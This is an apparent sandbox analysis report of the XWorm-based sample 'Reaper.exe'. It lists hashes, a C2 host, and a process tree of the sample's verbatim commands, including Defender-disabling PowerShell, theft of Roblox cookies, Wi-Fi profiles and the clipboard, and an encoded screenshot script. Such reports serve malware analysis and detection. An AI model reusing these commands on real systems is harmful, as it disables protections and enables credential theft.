Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

240312-1f3f5adc57 10

10-03-2024 04:41

240310-fbmjwscd28 10

10-03-2024 04:40

240310-fan2bscc93 10

10-03-2024 04:38

240310-e9wd1scc82 10

09-03-2024 07:38

240309-jghpnsdh88 10

Analysis

  • max time kernel
    148s
  • max time network
    170s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-03-2024 21:36

General

  • Target

    Reaper/Reaper/Reaper.exe

  • Size

    8.3MB

  • MD5

    79d145e3962e71bf725d15b4c0261dac

  • SHA1

    bc9d7a5a347fcefe3b3b81136e83af294bd489f4

  • SHA256

    0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d

  • SHA512

    2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df

  • SSDEEP

    196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Malware Config

Extracted

Family

xworm

C2

l838.ddns.net:3232

Attributes
  • Install_directory

    %AppData%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 44 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
    "C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3220
    • C:\Users\Admin\AppData\Local\Temp\Reaper.exe
      "C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:4596
    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3040
      • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4252
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4128
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3228
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:5032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3828
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4384
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4624
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2600
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\system32\tree.com
            tree /A /F
            5⤵
              PID:5116
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:376
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
                PID:208
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              4⤵
                PID:1480
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  5⤵
                  • Gathers system information
                  PID:5360
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4292
                • C:\Windows\system32\reg.exe
                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                  5⤵
                    PID:5352
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1956
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5264
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p2juz33y\p2juz33y.cmdline"
                      6⤵
                        PID:5472
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C4.tmp" "c:\Users\Admin\AppData\Local\Temp\p2juz33y\CSC17736DD4F6A1450A986486293441EC77.TMP"
                          7⤵
                            PID:5748
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:5184
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:5704
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          4⤵
                            PID:5848
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              5⤵
                                PID:3076
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                              4⤵
                                PID:6120
                                • C:\Windows\system32\attrib.exe
                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                  5⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:5532
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                4⤵
                                  PID:3120
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:4372
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                    4⤵
                                      PID:3176
                                      • C:\Windows\system32\attrib.exe
                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                        5⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:5292
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      4⤵
                                        PID:3496
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          5⤵
                                            PID:5888
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                          4⤵
                                            PID:5928
                                            • C:\Windows\system32\tasklist.exe
                                              tasklist /FO LIST
                                              5⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2060
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            4⤵
                                              PID:5940
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                5⤵
                                                  PID:3052
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                4⤵
                                                  PID:516
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4388
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                  4⤵
                                                    PID:4324
                                                    • C:\Windows\system32\getmac.exe
                                                      getmac
                                                      5⤵
                                                        PID:5728
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                      4⤵
                                                        PID:5860
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                          5⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5352
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30402\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\GrSuu.zip" *"
                                                        4⤵
                                                          PID:1512
                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI30402\rar.exe
                                                            C:\Users\Admin\AppData\Local\Temp\_MEI30402\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\GrSuu.zip" *
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:468
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          4⤵
                                                            PID:1116
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic os get Caption
                                                              5⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6064
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                            4⤵
                                                              PID:5400
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic computersystem get totalphysicalmemory
                                                                5⤵
                                                                  PID:3220
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                4⤵
                                                                  PID:1832
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic csproduct get uuid
                                                                    5⤵
                                                                      PID:3524
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                    4⤵
                                                                      PID:4988
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        5⤵
                                                                          PID:540
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
